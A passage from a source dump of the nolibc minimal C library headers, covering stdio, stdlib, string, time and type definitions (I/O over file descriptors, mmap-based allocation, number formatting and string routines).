EOF 21 | #define EOF (-1) 22 | #endif 23 | 24 | /* just define FILE as a non-empty type */ 25 | typedef struct FILE { 26 | char dummy[1]; 27 | } FILE; 28 | 29 | /* We define the 3 common stdio files as constant invalid pointers that 30 | * are easily recognized. 31 | */ 32 | static __attribute__((unused)) FILE* const stdin = (FILE*)-3; 33 | static __attribute__((unused)) FILE* const stdout = (FILE*)-2; 34 | static __attribute__((unused)) FILE* const stderr = (FILE*)-1; 35 | 36 | /* getc(), fgetc(), getchar() */ 37 | 38 | #define getc(stream) fgetc(stream) 39 | 40 | static __attribute__((unused)) 41 | int fgetc(FILE* stream) 42 | { 43 | unsigned char ch; 44 | int fd; 45 | 46 | if (stream < stdin || stream > stderr) 47 | return EOF; 48 | 49 | fd = 3 + (long)stream; 50 | 51 | if (read(fd, &ch, 1) <= 0) 52 | return EOF; 53 | return ch; 54 | } 55 | 56 | static __attribute__((unused)) 57 | int getchar(void) 58 | { 59 | return fgetc(stdin); 60 | } 61 | 62 | 63 | /* putc(), fputc(), putchar() */ 64 | 65 | #define putc(c, stream) fputc(c, stream) 66 | 67 | static __attribute__((unused)) 68 | int fputc(int c, FILE* stream) 69 | { 70 | unsigned char ch = c; 71 | int fd; 72 | 73 | if (stream < stdin || stream > stderr) 74 | return EOF; 75 | 76 | fd = 3 + (long)stream; 77 | 78 | if (write(fd, &ch, 1) <= 0) 79 | return EOF; 80 | return ch; 81 | } 82 | 83 | static __attribute__((unused)) 84 | int putchar(int c) 85 | { 86 | return fputc(c, stdout); 87 | } 88 | 89 | 90 | /* fwrite(), puts(), fputs(). Note that puts() emits '\n' but not fputs(). */ 91 | 92 | /* internal fwrite()-like function which only takes a size and returns 0 on 93 | * success or EOF on error. It automatically retries on short writes. 94 | */ 95 | static __attribute__((unused)) 96 | int _fwrite(const void *buf, size_t size, FILE *stream) 97 | { 98 | ssize_t ret; 99 | int fd; 100 | 101 | if (stream < stdin || stream > stderr) 102 | return EOF; 103 | 104 | fd = 3 + (long)stream; 105 | 106 | while (size) { 107 | ret = write(fd, buf, size); 108 | if (ret <= 0) 109 | return EOF; 110 | size -= ret; 111 | buf += ret; 112 | } 113 | return 0; 114 | } 115 | 116 | static __attribute__((unused)) 117 | size_t fwrite(const void *s, size_t size, size_t nmemb, FILE *stream) 118 | { 119 | size_t written; 120 | 121 | for (written = 0; written < nmemb; written++) { 122 | if (_fwrite(s, size, stream) != 0) 123 | break; 124 | s += size; 125 | } 126 | return written; 127 | } 128 | 129 | static __attribute__((unused)) 130 | int fputs(const char *s, FILE *stream) 131 | { 132 | return _fwrite(s, strlen(s), stream); 133 | } 134 | 135 | static __attribute__((unused)) 136 | int puts(const char *s) 137 | { 138 | if (fputs(s, stdout) == EOF) 139 | return EOF; 140 | return putchar('\n'); 141 | } 142 | 143 | 144 | /* fgets() */ 145 | static __attribute__((unused)) 146 | char *fgets(char *s, int size, FILE *stream) 147 | { 148 | int ofs; 149 | int c; 150 | 151 | for (ofs = 0; ofs + 1 < size;) { 152 | c = fgetc(stream); 153 | if (c == EOF) 154 | break; 155 | s[ofs++] = c; 156 | if (c == '\n') 157 | break; 158 | } 159 | if (ofs < size) 160 | s[ofs] = 0; 161 | return ofs ? s : NULL; 162 | } 163 | 164 | 165 | /* minimal vfprintf(). It supports the following formats: 166 | * - %[l*]{d,u,c,x,p} 167 | * - %s 168 | * - unknown modifiers are ignored. 169 | */ 170 | static __attribute__((unused)) 171 | int vfprintf(FILE *stream, const char *fmt, va_list args) 172 | { 173 | char escape, lpref, c; 174 | unsigned long long v; 175 | unsigned int written; 176 | size_t len, ofs; 177 | char tmpbuf[21]; 178 | const char *outstr; 179 | 180 | written = ofs = escape = lpref = 0; 181 | while (1) { 182 | c = fmt[ofs++]; 183 | 184 | if (escape) { 185 | /* we're in an escape sequence, ofs == 1 */ 186 | escape = 0; 187 | if (c == 'c' || c == 'd' || c == 'u' || c == 'x' || c == 'p') { 188 | char *out = tmpbuf; 189 | 190 | if (c == 'p') 191 | v = va_arg(args, unsigned long); 192 | else if (lpref) { 193 | if (lpref > 1) 194 | v = va_arg(args, unsigned long long); 195 | else 196 | v = va_arg(args, unsigned long); 197 | } else 198 | v = va_arg(args, unsigned int); 199 | 200 | if (c == 'd') { 201 | /* sign-extend the value */ 202 | if (lpref == 0) 203 | v = (long long)(int)v; 204 | else if (lpref == 1) 205 | v = (long long)(long)v; 206 | } 207 | 208 | switch (c) { 209 | case 'c': 210 | out[0] = v; 211 | out[1] = 0; 212 | break; 213 | case 'd': 214 | i64toa_r(v, out); 215 | break; 216 | case 'u': 217 | u64toa_r(v, out); 218 | break; 219 | case 'p': 220 | *(out++) = '0'; 221 | *(out++) = 'x'; 222 | /* fall through */ 223 | default: /* 'x' and 'p' above */ 224 | u64toh_r(v, out); 225 | break; 226 | } 227 | outstr = tmpbuf; 228 | } 229 | else if (c == 's') { 230 | outstr = va_arg(args, char *); 231 | if (!outstr) 232 | outstr="(null)"; 233 | } 234 | else if (c == '%') { 235 | /* queue it verbatim */ 236 | continue; 237 | } 238 | else { 239 | /* modifiers or final 0 */ 240 | if (c == 'l') { 241 | /* long format prefix, maintain the escape */ 242 | lpref++; 243 | } 244 | escape = 1; 245 | goto do_escape; 246 | } 247 | len = strlen(outstr); 248 | goto flush_str; 249 | } 250 | 251 | /* not an escape sequence */ 252 | if (c == 0 || c == '%') { 253 | /* flush pending data on escape or end */ 254 | escape = 1; 255 | lpref = 0; 256 | outstr = fmt; 257 | len = ofs - 1; 258 | flush_str: 259 | if (_fwrite(outstr, len, stream) != 0) 260 | break; 261 | 262 | written += len; 263 | do_escape: 264 | if (c == 0) 265 | break; 266 | fmt += ofs; 267 | ofs = 0; 268 | continue; 269 | } 270 | 271 | /* literal char, just queue it */ 272 | } 273 | return written; 274 | } 275 | 276 | static __attribute__((unused, format(printf, 2, 3))) 277 | int fprintf(FILE *stream, const char *fmt, ...) 278 | { 279 | va_list args; 280 | int ret; 281 | 282 | va_start(args, fmt); 283 | ret = vfprintf(stream, fmt, args); 284 | va_end(args); 285 | return ret; 286 | } 287 | 288 | static __attribute__((unused, format(printf, 1, 2))) 289 | int printf(const char *fmt, ...) 290 | { 291 | va_list args; 292 | int ret; 293 | 294 | va_start(args, fmt); 295 | ret = vfprintf(stdout, fmt, args); 296 | va_end(args); 297 | return ret; 298 | } 299 | 300 | static __attribute__((unused)) 301 | void perror(const char *msg) 302 | { 303 | fprintf(stderr, "%s%serrno=%d\n", (msg && *msg) ? msg : "", (msg && *msg) ? ": " : "", errno); 304 | } 305 | 306 | /* make sure to include all global symbols */ 307 | #include "nolibc.h" 308 | 309 | #endif /* _NOLIBC_STDIO_H */ 310 | -------------------------------------------------------------------------------- /exp/nolibc/stdlib.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * stdlib function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STDLIB_H 8 | #define _NOLIBC_STDLIB_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | #include "string.h" 15 | 16 | struct nolibc_heap { 17 | size_t len; 18 | char user_p[] __attribute__((__aligned__)); 19 | }; 20 | 21 | /* Buffer used to store int-to-ASCII conversions. Will only be implemented if 22 | * any of the related functions is implemented. The area is large enough to 23 | * store "18446744073709551615" or "-9223372036854775808" and the final zero. 24 | */ 25 | static __attribute__((unused)) char itoa_buffer[21]; 26 | 27 | /* 28 | * As much as possible, please keep functions alphabetically sorted. 29 | */ 30 | 31 | /* must be exported, as it's used by libgcc for various divide functions */ 32 | __attribute__((weak,unused,noreturn,section(".text.nolibc_abort"))) 33 | void abort(void) 34 | { 35 | sys_kill(sys_getpid(), SIGABRT); 36 | for (;;); 37 | } 38 | 39 | static __attribute__((unused)) 40 | long atol(const char *s) 41 | { 42 | unsigned long ret = 0; 43 | unsigned long d; 44 | int neg = 0; 45 | 46 | if (*s == '-') { 47 | neg = 1; 48 | s++; 49 | } 50 | 51 | while (1) { 52 | d = (*s++) - '0'; 53 | if (d > 9) 54 | break; 55 | ret *= 10; 56 | ret += d; 57 | } 58 | 59 | return neg ? -ret : ret; 60 | } 61 | 62 | static __attribute__((unused)) 63 | int atoi(const char *s) 64 | { 65 | return atol(s); 66 | } 67 | 68 | static __attribute__((unused)) 69 | void free(void *ptr) 70 | { 71 | struct nolibc_heap *heap; 72 | 73 | if (!ptr) 74 | return; 75 | 76 | heap = container_of(ptr, struct nolibc_heap, user_p); 77 | munmap(heap, heap->len); 78 | } 79 | 80 | /* getenv() tries to find the environment variable named in the 81 | * environment array pointed to by global variable "environ" which must be 82 | * declared as a char **, and must be terminated by a NULL (it is recommended 83 | * to set this variable to the "envp" argument of main()). If the requested 84 | * environment variable exists its value is returned otherwise NULL is 85 | * returned. getenv() is forcefully inlined so that the reference to "environ" 86 | * will be dropped if unused, even at -O0. 87 | */ 88 | static __attribute__((unused)) 89 | char *_getenv(const char *name, char **environ) 90 | { 91 | int idx, i; 92 | 93 | if (environ) { 94 | for (idx = 0; environ[idx]; idx++) { 95 | for (i = 0; name[i] && name[i] == environ[idx][i];) 96 | i++; 97 | if (!name[i] && environ[idx][i] == '=') 98 | return &environ[idx][i+1]; 99 | } 100 | } 101 | return NULL; 102 | } 103 | 104 | static inline __attribute__((unused,always_inline)) 105 | char *getenv(const char *name) 106 | { 107 | extern char **environ; 108 | return _getenv(name, environ); 109 | } 110 | 111 | static __attribute__((unused)) 112 | void *malloc(size_t len) 113 | { 114 | struct nolibc_heap *heap; 115 | 116 | /* Always allocate memory with size multiple of 4096. */ 117 | len = sizeof(*heap) + len; 118 | len = (len + 4095UL) & -4096UL; 119 | heap = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, 120 | -1, 0); 121 | if (__builtin_expect(heap == MAP_FAILED, 0)) 122 | return NULL; 123 | 124 | heap->len = len; 125 | return heap->user_p; 126 | } 127 | 128 | static __attribute__((unused)) 129 | void *calloc(size_t size, size_t nmemb) 130 | { 131 | size_t x = size * nmemb; 132 | 133 | if (__builtin_expect(size && ((x / size) != nmemb), 0)) { 134 | SET_ERRNO(ENOMEM); 135 | return NULL; 136 | } 137 | 138 | /* 139 | * No need to zero the heap, the MAP_ANONYMOUS in malloc() 140 | * already does it. 141 | */ 142 | return malloc(x); 143 | } 144 | 145 | static __attribute__((unused)) 146 | void *realloc(void *old_ptr, size_t new_size) 147 | { 148 | struct nolibc_heap *heap; 149 | size_t user_p_len; 150 | void *ret; 151 | 152 | if (!old_ptr) 153 | return malloc(new_size); 154 | 155 | heap = container_of(old_ptr, struct nolibc_heap, user_p); 156 | user_p_len = heap->len - sizeof(*heap); 157 | /* 158 | * Don't realloc() if @user_p_len >= @new_size, this block of 159 | * memory is still enough to handle the @new_size. Just return 160 | * the same pointer. 161 | */ 162 | if (user_p_len >= new_size) 163 | return old_ptr; 164 | 165 | ret = malloc(new_size); 166 | if (__builtin_expect(!ret, 0)) 167 | return NULL; 168 | 169 | memcpy(ret, heap->user_p, heap->len); 170 | munmap(heap, heap->len); 171 | return ret; 172 | } 173 | 174 | /* Converts the unsigned long integer to its hex representation into 175 | * buffer , which must be long enough to store the number and the 176 | * trailing zero (17 bytes for "ffffffffffffffff" or 9 for "ffffffff"). The 177 | * buffer is filled from the first byte, and the number of characters emitted 178 | * (not counting the trailing zero) is returned. The function is constructed 179 | * in a way to optimize the code size and avoid any divide that could add a 180 | * dependency on large external functions. 181 | */ 182 | static __attribute__((unused)) 183 | int utoh_r(unsigned long in, char *buffer) 184 | { 185 | signed char pos = (~0UL > 0xfffffffful) ? 60 : 28; 186 | int digits = 0; 187 | int dig; 188 | 189 | do { 190 | dig = in >> pos; 191 | in -= (uint64_t)dig << pos; 192 | pos -= 4; 193 | if (dig || digits || pos < 0) { 194 | if (dig > 9) 195 | dig += 'a' - '0' - 10; 196 | buffer[digits++] = '0' + dig; 197 | } 198 | } while (pos >= 0); 199 | 200 | buffer[digits] = 0; 201 | return digits; 202 | } 203 | 204 | /* converts unsigned long to an hex string using the static itoa_buffer 205 | * and returns the pointer to that string. 206 | */ 207 | static inline __attribute__((unused)) 208 | char *utoh(unsigned long in) 209 | { 210 | utoh_r(in, itoa_buffer); 211 | return itoa_buffer; 212 | } 213 | 214 | /* Converts the unsigned long integer to its string representation into 215 | * buffer , which must be long enough to store the number and the 216 | * trailing zero (21 bytes for 18446744073709551615 in 64-bit, 11 for 217 | * 4294967295 in 32-bit). The buffer is filled from the first byte, and the 218 | * number of characters emitted (not counting the trailing zero) is returned. 219 | * The function is constructed in a way to optimize the code size and avoid 220 | * any divide that could add a dependency on large external functions. 221 | */ 222 | static __attribute__((unused)) 223 | int utoa_r(unsigned long in, char *buffer) 224 | { 225 | unsigned long lim; 226 | int digits = 0; 227 | int pos = (~0UL > 0xfffffffful) ? 19 : 9; 228 | int dig; 229 | 230 | do { 231 | for (dig = 0, lim = 1; dig < pos; dig++) 232 | lim *= 10; 233 | 234 | if (digits || in >= lim || !pos) { 235 | for (dig = 0; in >= lim; dig++) 236 | in -= lim; 237 | buffer[digits++] = '0' + dig; 238 | } 239 | } while (pos--); 240 | 241 | buffer[digits] = 0; 242 | return digits; 243 | } 244 | 245 | /* Converts the signed long integer to its string representation into 246 | * buffer , which must be long enough to store the number and the 247 | * trailing zero (21 bytes for -9223372036854775808 in 64-bit, 12 for 248 | * -2147483648 in 32-bit). The buffer is filled from the first byte, and the 249 | * number of characters emitted (not counting the trailing zero) is returned. 250 | */ 251 | static __attribute__((unused)) 252 | int itoa_r(long in, char *buffer) 253 | { 254 | char *ptr = buffer; 255 | int len = 0; 256 | 257 | if (in < 0) { 258 | in = -in; 259 | *(ptr++) = '-'; 260 | len++; 261 | } 262 | len += utoa_r(in, ptr); 263 | return len; 264 | } 265 | 266 | /* for historical compatibility, same as above but returns the pointer to the 267 | * buffer. 268 | */ 269 | static inline __attribute__((unused)) 270 | char *ltoa_r(long in, char *buffer) 271 | { 272 | itoa_r(in, buffer); 273 | return buffer; 274 | } 275 | 276 | /* converts long integer to a string using the static itoa_buffer and 277 | * returns the pointer to that string. 278 | */ 279 | static inline __attribute__((unused)) 280 | char *itoa(long in) 281 | { 282 | itoa_r(in, itoa_buffer); 283 | return itoa_buffer; 284 | } 285 | 286 | /* converts long integer to a string using the static itoa_buffer and 287 | * returns the pointer to that string. Same as above, for compatibility. 288 | */ 289 | static inline __attribute__((unused)) 290 | char *ltoa(long in) 291 | { 292 | itoa_r(in, itoa_buffer); 293 | return itoa_buffer; 294 | } 295 | 296 | /* converts unsigned long integer to a string using the static itoa_buffer 297 | * and returns the pointer to that string. 298 | */ 299 | static inline __attribute__((unused)) 300 | char *utoa(unsigned long in) 301 | { 302 | utoa_r(in, itoa_buffer); 303 | return itoa_buffer; 304 | } 305 | 306 | /* Converts the unsigned 64-bit integer to its hex representation into 307 | * buffer , which must be long enough to store the number and the 308 | * trailing zero (17 bytes for "ffffffffffffffff"). The buffer is filled from 309 | * the first byte, and the number of characters emitted (not counting the 310 | * trailing zero) is returned. The function is constructed in a way to optimize 311 | * the code size and avoid any divide that could add a dependency on large 312 | * external functions. 313 | */ 314 | static __attribute__((unused)) 315 | int u64toh_r(uint64_t in, char *buffer) 316 | { 317 | signed char pos = 60; 318 | int digits = 0; 319 | int dig; 320 | 321 | do { 322 | if (sizeof(long) >= 8) { 323 | dig = (in >> pos) & 0xF; 324 | } else { 325 | /* 32-bit platforms: avoid a 64-bit shift */ 326 | uint32_t d = (pos >= 32) ? (in >> 32) : in; 327 | dig = (d >> (pos & 31)) & 0xF; 328 | } 329 | if (dig > 9) 330 | dig += 'a' - '0' - 10; 331 | pos -= 4; 332 | if (dig || digits || pos < 0) 333 | buffer[digits++] = '0' + dig; 334 | } while (pos >= 0); 335 | 336 | buffer[digits] = 0; 337 | return digits; 338 | } 339 | 340 | /* converts uint64_t to an hex string using the static itoa_buffer and 341 | * returns the pointer to that string. 342 | */ 343 | static inline __attribute__((unused)) 344 | char *u64toh(uint64_t in) 345 | { 346 | u64toh_r(in, itoa_buffer); 347 | return itoa_buffer; 348 | } 349 | 350 | /* Converts the unsigned 64-bit integer to its string representation into 351 | * buffer , which must be long enough to store the number and the 352 | * trailing zero (21 bytes for 18446744073709551615). The buffer is filled from 353 | * the first byte, and the number of characters emitted (not counting the 354 | * trailing zero) is returned. The function is constructed in a way to optimize 355 | * the code size and avoid any divide that could add a dependency on large 356 | * external functions. 357 | */ 358 | static __attribute__((unused)) 359 | int u64toa_r(uint64_t in, char *buffer) 360 | { 361 | unsigned long long lim; 362 | int digits = 0; 363 | int pos = 19; /* start with the highest possible digit */ 364 | int dig; 365 | 366 | do { 367 | for (dig = 0, lim = 1; dig < pos; dig++) 368 | lim *= 10; 369 | 370 | if (digits || in >= lim || !pos) { 371 | for (dig = 0; in >= lim; dig++) 372 | in -= lim; 373 | buffer[digits++] = '0' + dig; 374 | } 375 | } while (pos--); 376 | 377 | buffer[digits] = 0; 378 | return digits; 379 | } 380 | 381 | /* Converts the signed 64-bit integer to its string representation into 382 | * buffer , which must be long enough to store the number and the 383 | * trailing zero (21 bytes for -9223372036854775808). The buffer is filled from 384 | * the first byte, and the number of characters emitted (not counting the 385 | * trailing zero) is returned. 386 | */ 387 | static __attribute__((unused)) 388 | int i64toa_r(int64_t in, char *buffer) 389 | { 390 | char *ptr = buffer; 391 | int len = 0; 392 | 393 | if (in < 0) { 394 | in = -in; 395 | *(ptr++) = '-'; 396 | len++; 397 | } 398 | len += u64toa_r(in, ptr); 399 | return len; 400 | } 401 | 402 | /* converts int64_t to a string using the static itoa_buffer and returns 403 | * the pointer to that string. 404 | */ 405 | static inline __attribute__((unused)) 406 | char *i64toa(int64_t in) 407 | { 408 | i64toa_r(in, itoa_buffer); 409 | return itoa_buffer; 410 | } 411 | 412 | /* converts uint64_t to a string using the static itoa_buffer and returns 413 | * the pointer to that string. 414 | */ 415 | static inline __attribute__((unused)) 416 | char *u64toa(uint64_t in) 417 | { 418 | u64toa_r(in, itoa_buffer); 419 | return itoa_buffer; 420 | } 421 | 422 | /* make sure to include all global symbols */ 423 | #include "nolibc.h" 424 | 425 | #endif /* _NOLIBC_STDLIB_H */ 426 | -------------------------------------------------------------------------------- /exp/nolibc/string.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * string function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STRING_H 8 | #define _NOLIBC_STRING_H 9 | 10 | #include "std.h" 11 | 12 | static void *malloc(size_t len); 13 | 14 | /* 15 | * As much as possible, please keep functions alphabetically sorted. 16 | */ 17 | 18 | static __attribute__((unused)) 19 | int memcmp(const void *s1, const void *s2, size_t n) 20 | { 21 | size_t ofs = 0; 22 | int c1 = 0; 23 | 24 | while (ofs < n && !(c1 = ((unsigned char *)s1)[ofs] - ((unsigned char *)s2)[ofs])) { 25 | ofs++; 26 | } 27 | return c1; 28 | } 29 | 30 | static __attribute__((unused)) 31 | void *_nolibc_memcpy_up(void *dst, const void *src, size_t len) 32 | { 33 | size_t pos = 0; 34 | 35 | while (pos < len) { 36 | ((char *)dst)[pos] = ((const char *)src)[pos]; 37 | pos++; 38 | } 39 | return dst; 40 | } 41 | 42 | static __attribute__((unused)) 43 | void *_nolibc_memcpy_down(void *dst, const void *src, size_t len) 44 | { 45 | while (len) { 46 | len--; 47 | ((char *)dst)[len] = ((const char *)src)[len]; 48 | } 49 | return dst; 50 | } 51 | 52 | /* might be ignored by the compiler without -ffreestanding, then found as 53 | * missing. 54 | */ 55 | __attribute__((weak,unused,section(".text.nolibc_memmove"))) 56 | void *memmove(void *dst, const void *src, size_t len) 57 | { 58 | size_t dir, pos; 59 | 60 | pos = len; 61 | dir = -1; 62 | 63 | if (dst < src) { 64 | pos = -1; 65 | dir = 1; 66 | } 67 | 68 | while (len) { 69 | pos += dir; 70 | ((char *)dst)[pos] = ((const char *)src)[pos]; 71 | len--; 72 | } 73 | return dst; 74 | } 75 | 76 | /* must be exported, as it's used by libgcc on ARM */ 77 | __attribute__((weak,unused,section(".text.nolibc_memcpy"))) 78 | void *memcpy(void *dst, const void *src, size_t len) 79 | { 80 | return _nolibc_memcpy_up(dst, src, len); 81 | } 82 | 83 | /* might be ignored by the compiler without -ffreestanding, then found as 84 | * missing. 85 | */ 86 | __attribute__((weak,unused,section(".text.nolibc_memset"))) 87 | void *memset(void *dst, int b, size_t len) 88 | { 89 | char *p = dst; 90 | 91 | while (len--) { 92 | /* prevent gcc from recognizing memset() here */ 93 | asm volatile(""); 94 | *(p++) = b; 95 | } 96 | return dst; 97 | } 98 | 99 | static __attribute__((unused)) 100 | char *strchr(const char *s, int c) 101 | { 102 | while (*s) { 103 | if (*s == (char)c) 104 | return (char *)s; 105 | s++; 106 | } 107 | return NULL; 108 | } 109 | 110 | static __attribute__((unused)) 111 | int strcmp(const char *a, const char *b) 112 | { 113 | unsigned int c; 114 | int diff; 115 | 116 | while (!(diff = (unsigned char)*a++ - (c = (unsigned char)*b++)) && c) 117 | ; 118 | return diff; 119 | } 120 | 121 | static __attribute__((unused)) 122 | char *strcpy(char *dst, const char *src) 123 | { 124 | char *ret = dst; 125 | 126 | while ((*dst++ = *src++)); 127 | return ret; 128 | } 129 | 130 | /* this function is only used with arguments that are not constants or when 131 | * it's not known because optimizations are disabled. Note that gcc 12 132 | * recognizes an strlen() pattern and replaces it with a jump to strlen(), 133 | * thus itself, hence the asm() statement below that's meant to disable this 134 | * confusing practice. 135 | */ 136 | static __attribute__((unused)) 137 | size_t strlen(const char *str) 138 | { 139 | size_t len; 140 | 141 | for (len = 0; str[len]; len++) 142 | asm(""); 143 | return len; 144 | } 145 | 146 | /* do not trust __builtin_constant_p() at -O0, as clang will emit a test and 147 | * the two branches, then will rely on an external definition of strlen(). 148 | */ 149 | #if defined(__OPTIMIZE__) 150 | #define nolibc_strlen(x) strlen(x) 151 | #define strlen(str) ({ \ 152 | __builtin_constant_p((str)) ? \ 153 | __builtin_strlen((str)) : \ 154 | nolibc_strlen((str)); \ 155 | }) 156 | #endif 157 | 158 | static __attribute__((unused)) 159 | size_t strnlen(const char *str, size_t maxlen) 160 | { 161 | size_t len; 162 | 163 | for (len = 0; (len < maxlen) && str[len]; len++); 164 | return len; 165 | } 166 | 167 | static __attribute__((unused)) 168 | char *strdup(const char *str) 169 | { 170 | size_t len; 171 | char *ret; 172 | 173 | len = strlen(str); 174 | ret = malloc(len + 1); 175 | if (__builtin_expect(ret != NULL, 1)) 176 | memcpy(ret, str, len + 1); 177 | 178 | return ret; 179 | } 180 | 181 | static __attribute__((unused)) 182 | char *strndup(const char *str, size_t maxlen) 183 | { 184 | size_t len; 185 | char *ret; 186 | 187 | len = strnlen(str, maxlen); 188 | ret = malloc(len + 1); 189 | if (__builtin_expect(ret != NULL, 1)) { 190 | memcpy(ret, str, len); 191 | ret[len] = '\0'; 192 | } 193 | 194 | return ret; 195 | } 196 | 197 | static __attribute__((unused)) 198 | size_t strlcat(char *dst, const char *src, size_t size) 199 | { 200 | size_t len; 201 | char c; 202 | 203 | for (len = 0; dst[len]; len++) 204 | ; 205 | 206 | for (;;) { 207 | c = *src; 208 | if (len < size) 209 | dst[len] = c; 210 | if (!c) 211 | break; 212 | len++; 213 | src++; 214 | } 215 | 216 | return len; 217 | } 218 | 219 | static __attribute__((unused)) 220 | size_t strlcpy(char *dst, const char *src, size_t size) 221 | { 222 | size_t len; 223 | char c; 224 | 225 | for (len = 0;;) { 226 | c = src[len]; 227 | if (len < size) 228 | dst[len] = c; 229 | if (!c) 230 | break; 231 | len++; 232 | } 233 | return len; 234 | } 235 | 236 | static __attribute__((unused)) 237 | char *strncat(char *dst, const char *src, size_t size) 238 | { 239 | char *orig = dst; 240 | 241 | while (*dst) 242 | dst++; 243 | 244 | while (size && (*dst = *src)) { 245 | src++; 246 | dst++; 247 | size--; 248 | } 249 | 250 | *dst = 0; 251 | return orig; 252 | } 253 | 254 | static __attribute__((unused)) 255 | int strncmp(const char *a, const char *b, size_t size) 256 | { 257 | unsigned int c; 258 | int diff = 0; 259 | 260 | while (size-- && 261 | !(diff = (unsigned char)*a++ - (c = (unsigned char)*b++)) && c) 262 | ; 263 | 264 | return diff; 265 | } 266 | 267 | static __attribute__((unused)) 268 | char *strncpy(char *dst, const char *src, size_t size) 269 | { 270 | size_t len; 271 | 272 | for (len = 0; len < size; len++) 273 | if ((dst[len] = *src)) 274 | src++; 275 | return dst; 276 | } 277 | 278 | static __attribute__((unused)) 279 | char *strrchr(const char *s, int c) 280 | { 281 | const char *ret = NULL; 282 | 283 | while (*s) { 284 | if (*s == (char)c) 285 | ret = s; 286 | s++; 287 | } 288 | return (char *)ret; 289 | } 290 | 291 | /* make sure to include all global symbols */ 292 | #include "nolibc.h" 293 | 294 | #endif /* _NOLIBC_STRING_H */ 295 | -------------------------------------------------------------------------------- /exp/nolibc/time.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * time function definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_TIME_H 8 | #define _NOLIBC_TIME_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | 15 | static __attribute__((unused)) 16 | time_t time(time_t *tptr) 17 | { 18 | struct timeval tv; 19 | 20 | /* note, cannot fail here */ 21 | sys_gettimeofday(&tv, NULL); 22 | 23 | if (tptr) 24 | *tptr = tv.tv_sec; 25 | return tv.tv_sec; 26 | } 27 | 28 | /* make sure to include all global symbols */ 29 | #include "nolibc.h" 30 | 31 | #endif /* _NOLIBC_TIME_H */ 32 | -------------------------------------------------------------------------------- /exp/nolibc/types.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Special types used by various syscalls for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_TYPES_H 8 | #define _NOLIBC_TYPES_H 9 | 10 | #include "std.h" 11 | #include 12 | 13 | 14 | /* Only the generic macros and types may be defined here. The arch-specific 15 | * ones such as the O_RDONLY and related macros used by fcntl() and open(), or 16 | * the layout of sys_stat_struct must not be defined here. 17 | */ 18 | 19 | /* stat flags (WARNING, octal here) */ 20 | #define S_IFDIR 0040000 21 | #define S_IFCHR 0020000 22 | #define S_IFBLK 0060000 23 | #define S_IFREG 0100000 24 | #define S_IFIFO 0010000 25 | #define S_IFLNK 0120000 26 | #define S_IFSOCK 0140000 27 | #define S_IFMT 0170000 28 | 29 | #define S_ISDIR(mode) (((mode) & S_IFMT) == S_IFDIR) 30 | #define S_ISCHR(mode) (((mode) & S_IFMT) == S_IFCHR) 31 | #define S_ISBLK(mode) (((mode) & S_IFMT) == S_IFBLK) 32 | #define S_ISREG(mode) (((mode) & S_IFMT) == S_IFREG) 33 | #define S_ISFIFO(mode) (((mode) & S_IFMT) == S_IFIFO) 34 | #define S_ISLNK(mode) (((mode) & S_IFMT) == S_IFLNK) 35 | #define S_ISSOCK(mode) (((mode) & S_IFMT) == S_IFSOCK) 36 | 37 | /* dirent types */ 38 | #define DT_UNKNOWN 0x0 39 | #define DT_FIFO 0x1 40 | #define DT_CHR 0x2 41 | #define DT_DIR 0x4 42 | #define DT_BLK 0x6 43 | #define DT_REG 0x8 44 | #define DT_LNK 0xa 45 | #define DT_SOCK 0xc 46 | 47 | /* commonly an fd_set represents 256 FDs */ 48 | #ifndef FD_SETSIZE 49 | #define FD_SETSIZE 256 50 | #endif 51 | 52 | /* PATH_MAX and MAXPATHLEN are often used and found with plenty of different 53 | * values. 54 | */ 55 | #ifndef PATH_MAX 56 | #define PATH_MAX 4096 57 | #endif 58 | 59 | #ifndef MAXPATHLEN 60 | #define MAXPATHLEN (PATH_MAX) 61 | #endif 62 | 63 | /* Special FD used by all the *at functions */ 64 | #ifndef AT_FDCWD 65 | #define AT_FDCWD (-100) 66 | #endif 67 | 68 | /* whence values for lseek() */ 69 | #define SEEK_SET 0 70 | #define SEEK_CUR 1 71 | #define SEEK_END 2 72 | 73 | /* cmd for reboot() */ 74 | #define LINUX_REBOOT_MAGIC1 0xfee1dead 75 | #define LINUX_REBOOT_MAGIC2 0x28121969 76 | #define LINUX_REBOOT_CMD_HALT 0xcdef0123 77 | #define LINUX_REBOOT_CMD_POWER_OFF 0x4321fedc 78 | #define LINUX_REBOOT_CMD_RESTART 0x01234567 79 | #define LINUX_REBOOT_CMD_SW_SUSPEND 0xd000fce2 80 | 81 | /* Macros used on waitpid()'s return status */ 82 | #define WEXITSTATUS(status) (((status) & 0xff00) >> 8) 83 | #define WIFEXITED(status) (((status) & 0x7f) == 0) 84 | 85 | /* waitpid() flags */ 86 | #define WNOHANG 1 87 | 88 | /* standard exit() codes */ 89 | #define EXIT_SUCCESS 0 90 | #define EXIT_FAILURE 1 91 | 92 | #define FD_SETIDXMASK (8 * sizeof(unsigned long)) 93 | #define FD_SETBITMASK (8 * sizeof(unsigned long)-1) 94 | 95 | /* for select() */ 96 | typedef struct { 97 | unsigned long fds[(FD_SETSIZE + FD_SETBITMASK) / FD_SETIDXMASK]; 98 | } fd_set; 99 | 100 | #define FD_CLR(fd, set) do { \ 101 | fd_set *__set = (set); \ 102 | int __fd = (fd); \ 103 | if (__fd >= 0) \ 104 | __set->fds[__fd / FD_SETIDXMASK] &= 